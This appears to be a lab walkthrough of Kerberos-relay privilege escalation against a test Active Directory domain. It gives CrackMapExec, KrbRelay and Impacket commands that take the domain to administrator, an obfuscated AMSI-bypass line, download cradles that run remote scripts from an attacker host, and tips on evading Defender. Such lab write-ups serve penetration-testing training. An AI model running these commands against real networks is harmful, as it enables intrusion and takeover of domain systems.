KrbRelay Up - Linux
Another very useful technic to escalate privileges is kerberos relay, like implemented in KrbRelayUp
As KrbRelayUp is detected by defender, we will use the step by step approach like this writeup by @an0n_r0, using @cube0x0 KrbRelay
At the time of writing KrbRelay is not detected by defender.
The conditions to exploit this privesc is LDAP signing is NOT enforced, we can check that with cme ldap-signing module :
crackmapexec ldap 192.168.56.10-12 -u elena.lopez -p princesa1 -d north.newyork.local -M ldap-signing
Add computer and RBCD
To exploit krbrelay by adding a computer, you must be able to add new Computer, we can check that with cme MAQ module
crackmapexec ldap 192.168.56.11 -u elena.lopez -p princesa1 -d north.newyork.local -M MAQ
Add computer :
addcomputer.py -computer-name 'krbrelay$' -computer-pass 'ComputerPassword' -dc-host bronx.north.newyork.local -domain-netbios NORTH 'north.newyork.local/pacofish:pacofish'
addcomputer.py -computer-name 'krbrelay$' -computer-pass 'ComputerPassword' -dc-host bronx.north.newyork.local -domain-netbios NORTH 'north.newyork.local/elena.lopez:princesa1'Get the SID of that computer:
From windows
$o = ([ADSI]"LDAP://CN=krbrelay,CN=Computers,DC=north,DC=newyork,DC=local").objectSID
(New-Object System.Security.Principal.SecurityIdentifier($o.value, 0)).Value
S-1-5-21-3634065772-4036021599-3644360361-1136From Linux
lookupsid.py -domain-sids north.newyork.local/elena.lopez:princesa1@192.168.56.10 0powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.56.31:8000/PowerView.ps1', 'C:\Users\Elena.Lopez\Documents\PowerView.ps1')Check ports
xrdp
xfreerdp /u:pacofish /p:pacofish /v:192.168.56.11 /cert-ignorePS C:\Users\pacofish\Desktop> .\CheckPort.exe
[*] Looking for available ports..
[*] SYSTEM Is allowed through port 443Launch krbrelay
CLISID: CIeAxiInstallerService Class
https://strontic.github.io/xcyclopedia/library/clsid_90F18417-F0F1-484E-9D3C-59DCEEE5DBD8.htmlPS C:\Users\elena.lopez\Desktop> .\KrbRelay.exe -spn ldap/bronx.north.newyork.local -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -rbcd S-1-5-21-3634065772-4036021599-3644360361-1136 -port 443
Now we finish with RBCD exploitation
From Linux Impacket :
getTGT.py -dc-ip 'bronx.north.newyork.local' 'north.newyork.local'/'krbrelay$':'ComputerPassword'
export KRB5CCNAME=/workspace/krbrelay\$.ccache
getST.py -impersonate 'administrator' -spn 'CIFS/yonkers.north.newyork.local' -k -no-pass -dc-ip 'bronx.north.newyork.local' 'north.newyork.local'/'krbrelay$'
export KRB5CCNAME=/workspace/administrator@CIFS_yonkers.north.newyork.local@NORTH.NEWYORK.LOCAL.ccache
wmiexec.py -k @yonkers.north.newyork.local
C:\>whoami
north\administrator
with Rubeus from Windows
$x=[Ref].Assembly.GetType('System.Management.Automation.Am'+'siUt'+'ils');$y=$x.GetField('am'+'siCon'+'text',[Reflection.BindingFlags]'NonPublic,Static');$z=$y.GetValue($null);[Runtime.InteropServices.Marshal]::WriteInt32($z,0x41424344)
iex(new-object system.net.webclient).downloadstring('http://192.168.56.31:8080/amsi_rmouse.txt')
iex(new-object net.webclient).downloadstring('http://192.168.56.31:8080/PowerSharpPack/PowerSharpPack.ps1')
PowerSharpPack -rubeus -Command "hash /password:ComputerPassword"
PowerSharpPack -rubeus -Command "s4u /user:krbrelay$ /rc4:0EDDEDC35EB7B7ECDE0C9F0564E54C83 /impersonateuser:administrator /msdsspn:host/yonkers/ptt"And just like the writeup made by @an0n_r0 we launch SCMUACBypass.exe by Tyranid and get a system shell
Without AV or if you modify/obfuscate KrbRelayUp you can do the all things with the following commands:
.\KrbRelayUp.exe relay -Domain north.newyork.local -CreateNewComputerAccount -ComputerName evilhost2$ -ComputerPassword pass@123
./KrbRelayUp.exe spawn -m rbcd -d north.newyork.local -dc bronx.north.newyork.local -cn evilhost2$ -cp pass@123KrbRelay can also be used to relay to ADCS or to add msDS-KeyCredentialLink and exploit with ShadowCredentials. All you need to know is on this page, this is leave as an exercice to the reader.
With other methods
Last updated